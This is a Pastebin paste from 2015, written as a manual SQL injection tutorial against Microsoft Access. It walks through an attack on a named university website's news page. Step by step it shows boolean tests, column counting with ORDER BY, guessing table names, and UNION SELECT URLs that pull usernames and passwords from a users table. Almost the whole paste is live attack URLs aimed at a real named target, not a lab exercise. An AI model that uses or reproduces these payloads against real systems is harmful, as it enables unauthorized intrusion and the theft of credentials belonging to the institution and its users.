API tools faq
paste
Advertisement
Kyfx

Manual MSAccess SQL Injection Tutorial | Microsoft JET Datab

Kyfx
Mar 16th, 2015
393
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.23 KB | None | 0 0
raw download clone embed print report
  1. TOPIC:-Manual MSAccess SQL Injection Tutorial | Microsoft JET Database Engine error '80004005'
  2. Required
  3. Vulnerable website:-http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
  4. Now first job will be to confirm that the error is right because error doesn't means its vulnerable to sql injection.
  5. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1
  6. This web load normally open without an errors because 1 is always equal to 1
  7. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2
  8. This web don't load normally with an error because 1 is not equal to 2
  9. So now web 100% sql error
  10. Next step to find the numbers of columns
  11. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1--
  12. error
  13. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order b 100--
  14. error
  15. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12' order by 1--+-
  16. error
  17. may be last comment n0t work.
  18. now run the query without comment "--"
  19. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1
  20. worked
  21. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2
  22. now change the numbers still get error
  23. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7
  24. error
  25. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 6
  26. worked
  27. means web have 6 numbers 0f columns
  28. n0w union section:-
  29. After we have found the number of columns our next work is to guess the Table name
  30. and mostly name like(admin tbl_admin tb_admin wp_admin users user members login and etc)
  31. use table name with union select if table name is correct than we will get the vuln number on page
  32. now lets try
  33. our next query :-
  34. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=.12 union select 1,2,3,4,5,6 from admin
  35. not worked get an error
  36. try different tables
  37. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=.12 union select 1,2,3,4,5,6 from users
  38. worked and vuln columns is 2
  39. now try t0 guess columns name like(username, user, name, pass,password pwd passw and etc )
  40. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=.12 union all select 1,username,3,4,5,6 from users
  41. worked try t0 guess password
  42. http://www.cityuniversity.edu.pk/cusitnew/news.php?id=.12 union all select 1,passw,3,4,5,6 from users
  43. Finally done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!